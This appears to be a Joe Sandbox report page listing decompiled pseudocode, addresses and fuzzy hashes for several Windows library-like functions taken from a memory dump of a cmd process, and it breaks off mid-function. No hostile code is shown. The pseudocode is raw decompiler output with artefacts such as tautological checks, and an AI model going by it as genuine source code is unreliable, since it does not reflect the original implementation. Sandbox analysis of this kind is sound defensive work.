Uniqueness Score: -1.00%

Function 036C52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E036C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E036DEEF0(0x37b79a0);
					_t104 =  *0x37b8210; // 0x2f12d10
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E036DEB70(_t93, 0x37b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03709890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E036DEEF0(0x37b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E036DEB70(0, 0x37b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2f12d1d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E036FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E036DEEF0(0x37b79a0);
									__eflags =  *0x37b8210 - _t104; // 0x2f12d10
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x37b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03744888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E036DEB70(_t95, 0x37b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E037095D0();
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E037095D0();
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E036DEB70(_t93, 0x37b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E036FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x036c52a5
0x036c52ad
0x036c52b0
0x036c52b3
0x036c52b7
0x036c52ba
0x036c52bf
0x036c52c4
0x036c52cc
0x00000000
0x00000000
0x036c52ce
0x036c52d9
0x036c52dd
0x036c52e7
0x036c52f7
0x036c52f9
0x036c52fd
0x03720dcf
0x03720dd5
0x03720dd6
0x03720dd7
0x03720dd8
0x03720dd9
0x03720dde
0x03720ddf
0x03720de0
0x03720de1
0x03720de2
0x03720de5
0x03720dea
0x03720dec
0x03720f60
0x03720f64
0x03720f70
0x03720f76
0x03720f79
0x03720f79
0x00000000
0x03720f64
0x03720df2
0x03720df7
0x03720e04
0x03720e0d
0x03720e0d
0x03720e10
0x03720e1a
0x03720e1c
0x03720e4c
0x03720e52
0x03720e61
0x03720e67
0x03720e6b
0x03720e70
0x03720e76
0x03720ed7
0x03720edc
0x03720ee0
0x03720ee6
0x03720eea
0x03720eed
0x03720ef0
0x03720ef3
0x03720ef6
0x03720ef9
0x03720efe
0x03720f01
0x03720f01
0x03720f0b
0x03720f12
0x03720f16
0x03720f18
0x03720f1b
0x03720f2c
0x03720f31
0x03720f31
0x03720f35
0x03720f39
0x03720f3a
0x03720f3c
0x03720f3f
0x03720f50
0x03720f55
0x03720f55
0x03720f59
0x036c52eb
0x036c52f1
0x036c52f1
0x03720e7d
0x03720e84
0x03720e88
0x03720e8a
0x03720e8d
0x03720e9e
0x03720ea3
0x03720ea3
0x03720ea7
0x03720eaf
0x03720eb3
0x03720eb9
0x03720eb9
0x03720ebc
0x03720ecd
0x03720ecd
0x00000000
0x03720eb3
0x03720e21
0x03720e2b
0x03720e2f
0x03720e30
0x03720e3a
0x03720e3f
0x03720e41
0x00000000
0x00000000
0x03720e47
0x00000000
0x03720e47
0x03720df9
0x03720dfe
0x00000000
0x00000000
0x00000000
0x03720dfe
0x036c5303
0x036c5307
0x00000000
0x036c5309
0x00000000
0x036c5309
0x036c5307
0x036c52e9
0x036c52e9
0x00000000
0x036c52e9
0x036c530e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7497fa115672d9293ebc3bfbd238998a8bedb4e94e1990bb73bdc570398db8c
Instruction ID: 4950779627b4aa0058eeb0758c9728bca316582129bd3a6ae37320e50dd3a457
Opcode Fuzzy Hash: b7497fa115672d9293ebc3bfbd238998a8bedb4e94e1990bb73bdc570398db8c
Instruction Fuzzy Hash: 5D51DB74106781AFD720EF64C945B27BBE8FF80710F18091EE5968B691E774F844C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 036F2AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x37b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x37b8208; // 0x37b8207
				_t8 = _t57 + 0x37b8208; // 0x37b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x37b8450; // 0x2f15bbc
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x37b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x37b6d5c; // 0x7f0c0654
							_t72 =  *0x37b6d5c; // 0x7f0c0654
							_t75 =  *0x37b6d5c; // 0x7f0c0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x37b6d5c; // 0x7f0c0654
							_t84 =  *0x37b6d5c; // 0x7f0c0654
							_t87 =  *0x37b6d5c; // 0x7f0c0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0370F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x036f2ae4
0x036f2aec
0x036f2aef
0x036f2af4
0x036f2af7
0x036f2afd
0x036f2b92
0x036f2b92
0x036f2b97
0x036f2b9c
0x036f2b9c
0x036f2b03
0x036f2b06
0x036f2b09
0x036f2b09
0x036f2b0f
0x036f2b15
0x036f2b15
0x036f2b1b
0x036f2b1e
0x036f2b21
0x036f2b26
0x036f2b29
0x036f2b81
0x036f2b84
0x036f2c0e
0x036f2c15
0x036f2c24
0x036f2c24
0x036f2b8a
0x036f2b8a
0x036f2b8a
0x036f2b8a
0x036f2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x036f2b4a
0x036f2b4a
0x036f2b4d
0x036f2b53
0x00000000
0x00000000
0x036f2b55
0x036f2b58
0x036f2bb7
0x03735d1b
0x03735d37
0x03735d47
0x03735d53
0x036f2bbd
0x036f2bbd
0x036f2bbd
0x036f2bb7
0x036f2b5d
0x036f2c2f
0x03735d5b
0x03735d77
0x03735d87
0x03735d93
0x036f2c35
0x036f2c35
0x036f2c35
0x036f2c2f
0x036f2b65
0x036f2b9f
0x036f2ba2
0x036f2b67
0x036f2b67
0x036f2b69
0x036f2b6b
0x036f2b6e
0x036f2bc9
0x036f2bcc
0x036f2bcf
0x036f2bd4
0x036f2bd6
0x036f2bd6
0x036f2bdb
0x036f2c02
0x036f2c05
0x036f2c07
0x00000000
0x036f2c07
0x036f2be0
0x036f2c00
0x036f2c3f
0x036f2c3f
0x00000000
0x036f2c00
0x036f2be5
0x036f2be7
0x036f2bec
0x036f2bf4
0x036f2bf6
0x00000000
0x036f2bf6
0x036f2b70
0x036f2b76
0x036f2b2b
0x036f2b2b
0x036f2b2d
0x036f2b2f
0x036f2b32
0x036f2b35
0x036f2b3a
0x00000000
0x036f2b40
0x036f2b43
0x036f2b45
0x036f2b47
0x036f2b4a
0x036f2b4d
0x036f2b53
0x00000000
0x00000000
0x00000000
0x036f2b53
0x036f2b78
0x036f2b78
0x036f2b7b
0x036f2b7e
0x00000000
0x036f2b7e
0x036f2b76
0x036f2ba5
0x036f2ba5
0x036f2ba8
0x036f2bad
0x00000000
0x00000000
0x036f2baf
0x036f2baf
0x036f2bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b6098d8a63f759d53246b8299cf7de0e028556d454e963705ba48dbf1a9f68
Instruction ID: d530e1683968dd0e4d4a2913cda065bb599b4ba628889a99524e4d3aa96578de
Opcode Fuzzy Hash: c0b6098d8a63f759d53246b8299cf7de0e028556d454e963705ba48dbf1a9f68
Instruction Fuzzy Hash: A451E17AE00115CFCB18DF1CC8A09BEB7B5FB88704715895AED46AB358E734AA51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0378AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0378AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0378C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0378ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0378FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0378EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E036E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03781608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03791536(0x37b8ae4, (_t74 -  *0x37b8b04 >> 0x14) + (_t74 -  *0x37b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0378C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0378A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0376CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0378ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0378ae44
0x0378ae4c
0x0378ae53
0x0378ae55
0x0378ae5c
0x0378ae64
0x0378ae68
0x0378ae75
0x0378ae75
0x0378ae78
0x0378ae7a
0x0378ae7c
0x0378ae7f
0x0378aea8
0x0378aeab
0x0378aead
0x00000000
0x00000000
0x0378aeb3
0x0378aeb8
0x0378aebb
0x0378aebd
0x00000000
0x0378ae81
0x0378ae88
0x0378ae8f
0x0378ae9b
0x0378ae96
0x0378ae96
0x0378ae96
0x0378aea0
0x0378aea3
0x0378aebf
0x0378aebf
0x0378aec3
0x0378aec9
0x0378af0d
0x0378af14
0x0378af3d
0x0378af3d
0x0378af41
0x0378af44
0x0378af67
0x0378af67
0x0378af6a
0x0378afca
0x0378afd1
0x00000000
0x0378afd1
0x0378af6c
0x0378af6d
0x0378af75
0x0378af7c
0x0378af7e
0x0378af80
0x0378af85
0x0378af87
0x0378af99
0x0378af89
0x0378af92
0x0378af92
0x0378af9e
0x0378afa1
0x0378afa3
0x0378afa9
0x0378afb0
0x0378afb2
0x0378afb4
0x0378afbc
0x0378afbc
0x0378afb4
0x0378afb0
0x00000000
0x0378afa1
0x0378af4f
0x0378af57
0x0378af5c
0x0378af5e
0x00000000
0x00000000
0x0378af60
0x0378af64
0x0378af64
0x00000000
0x0378af64
0x0378af1a
0x0378af25
0x00000000
0x00000000
0x0378af27
0x0378af28
0x0378af33
0x00000000
0x0378aed0
0x0378aed0
0x0378aed2
0x0378aee1
0x0378aee4
0x00000000
0x00000000
0x0378aee6
0x0378aeec
0x00000000
0x00000000
0x0378aefb
0x0378af07
0x0378afd3
0x0378afdb
0x0378afdb
0x00000000
0x0378af07
0x0378aed6
0x0378aed8
0x0378aedf
0x00000000
0x00000000
0x00000000
0x0378aedf
0x0378aec9

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3cac304a217677b5be7a08bd5aa11dfae790ca8e82b95e3a8a23bc4e7693f0f
Instruction ID: 1f74213bd36440f961867fa9603808efde75bf713dea7c3f372090976242ea33
Opcode Fuzzy Hash: b3cac304a217677b5be7a08bd5aa11dfae790ca8e82b95e3a8a23bc4e7693f0f
Instruction Fuzzy Hash: 8441F7B1780711DBD766FB29C898F3BF399EF84620F0C461AF8568B290DB34D802D691

Uniqueness

Uniqueness Score: -1.00%

Function 036EDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E036EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E036CCC50(E036C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E036E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03798ED6(_t102, _t98);
						}
						_t76 = _v44;
						E036E2280(_t58, _v44);
						E036EDD82(_v44, _t102, _t98);
						E036EB944(_t102, _v5);
						return E036DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x37b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x37b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x37b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x37b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x378fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x036edbe9
0x036edbf2
0x036edbf7
0x036edbf9
0x036edbfc
0x036edc00
0x036edc03
0x036edc14
0x036edd54
0x036edd54
0x036edd54
0x036edc18
0x036edc1d
0x036edc1d
0x036edc32
0x036edc3b
0x036edc3e
0x036edc46
0x036edd5b
0x036edd62
0x036edd64
0x036edd67
0x036edd69
0x036edd6b
0x036edd6e
0x036edd70
0x036edd73
0x036edd73
0x00000000
0x036edc4c
0x036edc4e
0x03733ae3
0x03733ae8
0x03733aea
0x036edce7
0x036edce9
0x036edcec
0x036edcee
0x036edcf0
0x036edcf3
0x036edcf5
0x03733af2
0x03733af5
0x03733af5
0x036edd06
0x036edd08
0x036edd0b
0x036edd12
0x03733b08
0x036edd18
0x036edd18
0x036edd18
0x036edd20
0x036edd23
0x03733b16
0x03733b16
0x036edd29
0x036edd2d
0x036edd36
0x036edd40
0x036edd51
0x036edd51
0x036edc54
0x036edc59
0x036edc59
0x036edc5e
0x036edc5e
0x036edc63
0x036edc66
0x036edc6b
0x036edc78
0x036edc7b
0x036edc81
0x036edc81
0x036edc83
0x036edc89
0x00000000
0x00000000
0x036edd7b
0x036edd7b
0x036edc8f
0x036edc8f
0x036edc92
0x036edc99
0x036edc9f
0x036edca5
0x036edcaa
0x036edcaa
0x036edcb3
0x036edcb8
0x036edcbb
0x036edcc1
0x036edccf
0x036edcd2
0x036edcd5
0x036edcd7
0x036edcda
0x036edcdc
0x036edcdc
0x036edce2
0x036edce4
0x00000000
0x036edce4

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a57e0247cba58fe32286549596833efd4d91fe15e94644a7b0b728c60522be6
Instruction ID: df06041e6a054274f7e594221b9738c0ab3e22a1c0b9060ed5156be78071eaef
Opcode Fuzzy Hash: 7a57e0247cba58fe32286549596833efd4d91fe15e94644a7b0b728c60522be6
Instruction Fuzzy Hash: DE510075A02215DFCB14CFA8C490BAEFBF9FF49350F24819AD555AB340EB30A948CB91

Uniqueness

Uniqueness Score: -1.00%

Function 036DEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E036DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
